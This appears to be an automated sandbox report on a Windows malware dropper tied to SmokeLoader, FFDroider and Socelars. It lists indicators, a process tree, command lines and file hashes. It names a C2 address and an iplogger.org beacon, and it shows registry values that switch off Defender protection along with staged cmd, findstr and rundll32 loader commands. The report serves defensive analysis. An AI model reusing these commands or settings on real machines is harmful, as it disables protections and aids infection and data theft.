Analysis
max time kernel: 126s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20231215-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31/12/2023, 13:10
Static task: static1
General
Target: 42909ef96fc66ee4ad2b1182f06ecbe6.exe
Size: 3.8MB
MD5: 42909ef96fc66ee4ad2b1182f06ecbe6
SHA1: 9ccde9b068c6dca4172df09853e8b9aa9dcded94
SHA256: 4cafb22334d394a75bf299e8b582791b939af7d462c79b4423948a34f364481b
SHA512: e54ef137f1a12fa1c77090ade5e6fd5c404f84a5c3d0b9227fe95eb72d30e6d03fd0431c265569f7b08dc5f416973081264aa3d634399f30ad273da8f4559f9a
SSDEEP: 98304:Ub9fEIQBU9HIJ0tyFximjgX7dJw1mLPKZ4ygx2EjufaWte:UpfEIvdIJ0WxHjm5JwSiZ3rEAaH
Malware Config
Extracted: smokeloader
  pub2
Extracted: ffdroider
  http://128.1.32.84
Signatures

FFDroider payload 1 IoCs
  resource | yara_rule
  behavioral2/memory/3096-101-0x0000000000400000-0x000000000063B000-memory.dmp | family_ffdroider

Modifies Windows Defender Real-time Protection settings
  description | ioc | Process
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | xtect20.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | xtect20.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | xtect20.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | xtect20.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | xtect20.exe
  Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" | xtect20.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | xtect20.exe

Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
  description | pid | pid_target | Process | procid_target
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5196 | 2216 | rUNdlL32.eXe | 110

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars payload 1 IoCs
  resource | yara_rule
  behavioral2/files/0x0006000000023230-77.dat | family_socelars

Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation | Folder.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation | 42909ef96fc66ee4ad2b1182f06ecbe6.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation | Fille.exe

Executes dropped EXE 12 IoCs
  pid | Process
  1236 | Fille.exe
  368 | Folder.exe
  516 | BearVpn_3.exe
  4708 | Files.exe
  3124 | KRSetp.exe
  3096 | md9_1sjm.exe
  1420 | Install.exe
  5056 | pub2.exe
  2344 | xtect20.exe
  4208 | Folder.exe
  5240 | Mantenere.exe.com
  5452 | Mantenere.exe.com

Loads dropped DLL 2 IoCs
  pid | Process
  5224 | rundll32.exe
  5056 | pub2.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

VMProtect (yara rule: vmprotect) 3 IoCs
  resource | yara_rule
  behavioral2/memory/3096-101-0x0000000000400000-0x000000000063B000-memory.dmp | vmprotect
  behavioral2/files/0x000600000002322f-88.dat | vmprotect
  behavioral2/files/0x000600000002322f-87.dat | vmprotect

Checks whether UAC is enabled
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | md9_1sjm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  17 | ipinfo.io
  16 | ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext 1 IoCs
  description | pid | Process
  PID 5452 set thread context of 0 | 5452 | Mantenere.exe.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Program crash 1 IoCs
  pid | pid_target | Process
  5396 | 5224 | WerFault.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe

Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | msedge.exe
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | msedge.exe

Enumerates system info in registry 2 TTPs 5 IoCs
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | msedge.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe

Modifies system certificate store
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | Install.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = [blob data not captured in this copy of the report] | Install.exe

Runs ping.exe 1 TTPs 1 IoCs
  pid | Process
  5268 | PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs
  pid | Process | count
  1916 | msedge.exe | 2
  3092 | msedge.exe | 2
  5056 | pub2.exe | 2
  5756 | identity_helper.exe | 2
  1132 | msedge.exe | 4

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  pid | Process | count
  1916 | msedge.exe | 8

Suspicious use of AdjustPrivilegeToken 36 IoCs
  description | pid | Process
  Token: SeDebugPrivilege | 516 | BearVpn_3.exe
  Token: SeCreateTokenPrivilege | 1420 | Install.exe
  Token: SeAssignPrimaryTokenPrivilege | 1420 | Install.exe
  Token: SeLockMemoryPrivilege | 1420 | Install.exe
  Token: SeIncreaseQuotaPrivilege | 1420 | Install.exe
  Token: SeMachineAccountPrivilege | 1420 | Install.exe
  Token: SeTcbPrivilege | 1420 | Install.exe
  Token: SeSecurityPrivilege | 1420 | Install.exe
  Token: SeTakeOwnershipPrivilege | 1420 | Install.exe
  Token: SeLoadDriverPrivilege | 1420 | Install.exe
  Token: SeSystemProfilePrivilege | 1420 | Install.exe
  Token: SeSystemtimePrivilege | 1420 | Install.exe
  Token: SeProfSingleProcessPrivilege | 1420 | Install.exe
  Token: SeIncBasePriorityPrivilege | 1420 | Install.exe
  Token: SeCreatePagefilePrivilege | 1420 | Install.exe
  Token: SeCreatePermanentPrivilege | 1420 | Install.exe
  Token: SeBackupPrivilege | 1420 | Install.exe
  Token: SeRestorePrivilege | 1420 | Install.exe
  Token: SeShutdownPrivilege | 1420 | Install.exe
  Token: SeDebugPrivilege | 1420 | Install.exe
  Token: SeAuditPrivilege | 1420 | Install.exe
  Token: SeSystemEnvironmentPrivilege | 1420 | Install.exe
  Token: SeChangeNotifyPrivilege | 1420 | Install.exe
  Token: SeRemoteShutdownPrivilege | 1420 | Install.exe
  Token: SeUndockPrivilege | 1420 | Install.exe
  Token: SeSyncAgentPrivilege | 1420 | Install.exe
  Token: SeEnableDelegationPrivilege | 1420 | Install.exe
  Token: SeManageVolumePrivilege | 1420 | Install.exe
  Token: SeImpersonatePrivilege | 1420 | Install.exe
  Token: SeCreateGlobalPrivilege | 1420 | Install.exe
  Token: 31 | 1420 | Install.exe
  Token: 32 | 1420 | Install.exe
  Token: 33 | 1420 | Install.exe
  Token: 34 | 1420 | Install.exe
  Token: 35 | 1420 | Install.exe
  Token: SeDebugPrivilege | 3124 | KRSetp.exe

Suspicious use of FindShellTrayWindow 25 IoCs
  pid | Process | count
  1916 | msedge.exe | 25

Suspicious use of SendNotifyMessage 24 IoCs
  pid | Process | count
  1916 | msedge.exe | 24

Suspicious use of SetWindowsHookEx 1 IoCs
  pid | Process
  2344 | xtect20.exe

Suspicious use of WriteProcessMemory 64 IoCs
  description | pid | Process | procid_target | count
  PID 2296 wrote to memory of 1236 | 2296 | 42909ef96fc66ee4ad2b1182f06ecbe6.exe | 92 | 3
  PID 2296 wrote to memory of 368 | 2296 | 42909ef96fc66ee4ad2b1182f06ecbe6.exe | 94 | 3
  PID 2296 wrote to memory of 516 | 2296 | 42909ef96fc66ee4ad2b1182f06ecbe6.exe | 127 | 2
  PID 2296 wrote to memory of 4708 | 2296 | 42909ef96fc66ee4ad2b1182f06ecbe6.exe | 126 | 2
  PID 2296 wrote to memory of 3124 | 2296 | 42909ef96fc66ee4ad2b1182f06ecbe6.exe | 125 | 2
  PID 2296 wrote to memory of 3096 | 2296 | 42909ef96fc66ee4ad2b1182f06ecbe6.exe | 124 | 3
  PID 2296 wrote to memory of 1420 | 2296 | 42909ef96fc66ee4ad2b1182f06ecbe6.exe | 123 | 3
  PID 2296 wrote to memory of 5056 | 2296 | 42909ef96fc66ee4ad2b1182f06ecbe6.exe | 122 | 3
  PID 2296 wrote to memory of 2344 | 2296 | 42909ef96fc66ee4ad2b1182f06ecbe6.exe | 96 | 3
  PID 1236 wrote to memory of 2256 | 1236 | Fille.exe | 97 | 3
  PID 368 wrote to memory of 4208 | 368 | Folder.exe | 103 | 3
  PID 2296 wrote to memory of 1916 | 2296 | 42909ef96fc66ee4ad2b1182f06ecbe6.exe | 102 | 2
  PID 2256 wrote to memory of 2528 | 2256 | cmd.exe | 101 | 3
  PID 1916 wrote to memory of 1132 | 1916 | msedge.exe | 100 | 2
  PID 2528 wrote to memory of 4476 | 2528 | cmd.exe | 99 | 3
  PID 1916 wrote to memory of 1536 | 1916 | msedge.exe | 106 | 24
Processes
(tree depth shown in brackets; each entry lists the image path, the observed command line, the PID and the signatures it triggered)

[1] C:\Users\Admin\AppData\Local\Temp\42909ef96fc66ee4ad2b1182f06ecbe6.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\42909ef96fc66ee4ad2b1182f06ecbe6.exe"
    PID: 2296
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\Fille.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Fille.exe"
      PID: 1236
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c cmd < Crescente.ini
        PID: 2256
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe
          cmdline: cmd
          PID: 2528
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mantenere.exe.com
            cmdline: Mantenere.exe.com k
            PID: 5240
            - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mantenere.exe.com
              cmdline: C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mantenere.exe.com k
              PID: 5452
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
        [5] C:\Windows\SysWOW64\PING.EXE
            cmdline: ping 127.0.0.1 -n 30
            PID: 5268
            - Runs ping.exe
  [2] C:\Users\Admin\AppData\Local\Temp\Folder.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
      PID: 368
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\Folder.exe
        cmdline: "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
        PID: 4208
        - Executes dropped EXE
  [2] C:\Users\Admin\AppData\Local\Temp\xtect20.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\xtect20.exe"
      PID: 2344
      - Modifies Windows Defender Real-time Protection settings
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS67
      PID: 1916
      - Enumerates system info in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of WriteProcessMemory
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2900 /prefetch:8
        PID: 1256
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3
        PID: 3092
        - Suspicious behavior: EnumeratesProcesses
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
        PID: 1536
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
        PID: 2132
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
        PID: 5064
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
        PID: 5756
        - Suspicious behavior: EnumeratesProcesses
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
        PID: 5740
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
        PID: 5880
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,13136715796903997292,12883912959621315631,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
        PID: 5872
  [2] C:\Users\Admin\AppData\Local\Temp\pub2.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
      PID: 5056
      - Executes dropped EXE
      - Loads dropped DLL
      - Checks SCSI registry key(s)
      - Suspicious behavior: EnumeratesProcesses
  [2] C:\Users\Admin\AppData\Local\Temp\Install.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      PID: 1420
      - Executes dropped EXE
      - Modifies system certificate store
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
      PID: 3096
      - Executes dropped EXE
      - Checks whether UAC is enabled
  [2] C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
      PID: 3124
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\Files.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Files.exe"
      PID: 4708
      - Executes dropped EXE
  [2] C:\Users\Admin\AppData\Local\Temp\BearVpn_3.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\BearVpn_3.exe"
      PID: 516
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\SysWOW64\findstr.exe
    cmdline: findstr /V /R "^lmesxrORijUjeOjnoLtleIpFEzCCKScCJihKoesqpDBLYVUYVpGiCQFBdvNwBjigQsDUABfuxtqninHJmDGAjhqSBLxMfdnXvjUGsqbxTANbPixRPrCXGGeDdLaPiD$" Piramide.ini
    PID: 4476

[1] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9347a46f8,0x7ff9347a4708,0x7ff9347a4718
    PID: 1132
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses

[1] C:\Windows\System32\CompPkgSrv.exe
    cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 2928

[1] C:\Windows\System32\CompPkgSrv.exe
    cmdline: C:\Windows\System32\CompPkgSrv.exe -Embedding
    PID: 5144

[1] C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5224 -ip 5224
    PID: 5364

[1] C:\Windows\SysWOW64\WerFault.exe
    cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5224 -s 604
    PID: 5396
    - Program crash

[1] C:\Windows\SysWOW64\rundll32.exe
    cmdline: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    PID: 5224
    - Loads dropped DLL

[1] C:\Windows\system32\rUNdlL32.eXe
    cmdline: rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
    PID: 5196
    - Process spawned unexpected child process

[1] C:\Windows\system32\dwm.exe
    cmdline: "dwm.exe"
    PID: 4040
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 736KB
MD5: 8c18e329e806ec6dd6329b63a51e3b19
SHA1: b085fe36bb65780fb0f8fdcc1fd62db3b10163e4
SHA256: 67accf28cf796fdc2c23795c42d9b24fc2a662c21f889afbf77df54b8d466213
SHA512: 8a86de54bc3d98abb0082221acca50e11f692ca7e24b497ecab3ea44a9aa9689cc6e7759e940b25d7120acc86ac7d901c190bceae2c7f58dc9a2b68570a1eba7

Filesize: 63KB
MD5: 0d5df43af2916f47d00c1573797c1a13
SHA1: 230ab5559e806574d26b4c20847c368ed55483b0
SHA256: c066aee7aa3aa83f763ebc5541daa266ed6c648fbffcde0d836a13b221bb2adc
SHA512: f96cf9e1890746b12daf839a6d0f16f062b72c1b8a40439f96583f242980f10f867720232a6fa0f7d4d7ac0a7a6143981a5a130d6417ea98b181447134c7cfe2

Filesize: 8KB
MD5: 60fda22bdeacf110bd17e573d4755179
SHA1: 9ec652c1adfdd612ff94d5405b37d6ce2cdeee58
SHA256: 75c08d47e30fb238396887e7dfe14468e8f55563fd157ff27620e91e37a9a9a0
SHA512: 29b5a77bbf9ab7dfd6914fdb7ca516c329aa6dcd23958276f2373566ce94b294add0ecd241f83ff77456a558b2089d7d2cee0867b1b5de7630f62b3b73848afb

Filesize: 239KB
MD5: 9d8cf8de9b97800927728c11c3ea1a05
SHA1: 0f22a1883ee171c6dd3ca2a7989e3585852fb3e7
SHA256: 684be08639023e02b2940bea89373e8657bf7b4fb826d22455058ae40f3b57f3
SHA512: 021834c482a20e7d998ffd8af980f0b73a16c13967966d9ec211d269ec2df990d8f5313b9567e5daaa590dfa91abe2ec57a7a9693197e110b75f035b6f404887

Filesize: 106KB
MD5: f362b753e4ec9e8a7525ee9bb7fb4245
SHA1: 2bc66ccc205c5304083733c30202d25d8f14591a
SHA256: 5f5cf15838c36569f5cb3a323e5af3099f76f42d46f2799bed5a31ed8d34c0c6
SHA512: 8139d41b3795690d44e1536eb7b7b31e4ce59f43ab8c5f786089256c2c9556630701b21dd41e3f6b8f227ee53f5e145899b34ea5f8dac8749840cb9a7a93aae8

Filesize: 1.1MB
MD5: e35987fd2d4cd3ff879d467319e43709
SHA1: f55a7b78b464043abfb153e7f6d2d0688b78b261
SHA256: 4ca6fef9e1702bbe7f84460fb9bb7cbd2085553b7fa489936e145291846175c8
SHA512: fee1fd18f42956b48f033cbcc8183c5893b9ec1a458165d585ef32e3c258f13739f74ddd3e6cf58ac200cbc1fca3fded71bf97692b9179396b2aab51a14f7b63

Filesize: 513KB
MD5: a1440ffa153e0cfb01ccfe9fd416a585
SHA1: 9ed64451ea200df419b0eddaf07f2c8bd06f256f
SHA256: 21c95dd82e89b7be42ec5572da38848d059abe82cb4ef76fc088a1f6b918b219
SHA512: 2a5e16f53e0e71ad2e865d8c5724a490d91c4260f71dd02299a1b3d652f1e8e72bf2a3590ae76d72541a8d56cd1a8a0b9e12c130d95bff3d9480b9ae800d6b2b

Filesize: 129KB
MD5: 72480579197d5c32b019f9d32cecb329
SHA1: b8b03c52ab556dbcc85796ed08e4ece5c5fa3b4c
SHA256: 4386f22a20a06dc9d9ab75ec5bc12322aaf588ddec42de7ad13d190c1b6ebf72
SHA512: 6ec259b09f75e2d5f9385f6421dee4d83d08982baa85a366ecb3eb657855987630aaed2b0a277e580daca7fb78a22334ab02e2dd79e0dc44444c66efecda14f7

Filesize: 712KB
MD5: b89068659ca07ab9b39f1c580a6f9d39
SHA1: 7e3e246fcf920d1ada06900889d099784fe06aa5
SHA256: 9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
SHA512: 940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Filesize: 92KB
MD5: 3836e5426f33225c00c064dccd94ae33
SHA1: bf7701b04e6aedeaaa6aa9c653aa76c4bd073297
SHA256: 97ec7ebd5b3387150f7d4f8dbdce479e2c6aded98a1166cbc9bf9a3192f7d7ed
SHA512: 20e3f5e900381a6b45cdcc35975a209e1b75ce109123ccf93745e77ad13fa60623fc371bc8f678ff0beb1a3727ffa20576c08fb0ff88bf69af2b2e4d9ffab442

Filesize: 382KB
MD5: e596307db2e65d10e81bd192c43cbfe6
SHA1: 3b2a8210cbd21af8d1ad693cbaa56e9414b38ca8
SHA256: ea2abd3705e0b9e96b9f71ce60f583518725b375f9246cc3f15aa09365deb747
SHA512: dbe5ce9076c1a923ac5af09c01932f50b5a7729cea5b1fead1737c2c13f7b53508edadb9a7145698ba915140c08c261ed40cd0e2e12db1cdd544de6fb1fa7757

Filesize: 166KB
MD5: 63ead911676a9c9431f185fa3b415dc7
SHA1: bf86775b8713f8461fd7cc81104e7abedabd2885
SHA256: 9e90ed11bd37b8004921c0b5c1668d2a3780b223055d6f4a31ce2ede411a3dfd
SHA512: e78d110b96404c63b86b7c5c91eff18221be0a846a4e11bca633ac0e7a2c5b40be2d5e1bc5645f9d3144a9c3d38a05809f3fe21a129333344cbd4de9e39d3c9c

Filesize: 758KB
MD5: d7eb620404874d7f77870f1b1ecaeee3
SHA1: e281d765ee3facac0140732427c291f1a31d90b4
SHA256: 1dce5d2a9682c811f7c4dd7e4f4c8f26ba35bba8803efe316aabddafb41c1708
SHA512: 5042740a5f8d650cdce19b07eb45896dac5b76c853a60158b4c09ddbf83f3463ba6789dc93357aad18343add3a84e1e518c9511e0bc1af16ff16966007ad4bb8

Filesize: 388KB
MD5: f2dfde67032f5588efb144f1f1876fad
SHA1: 7cbdaea73fc6d3d11e8396bd1c3c3047f4ae72ca
SHA256: 6221ceb036e31af3ef7b047082a2cde3e28d7981e3dfd5fbb99053d64cb42c9d
SHA512: ae34c51d444faf1c562e0cdd1ed4bfce8c20bd8c9a61c622335405597a91c6a37ed991bfc48b30540cbae943a7972c5f8a0e9d064404c581570865a52ba7f41d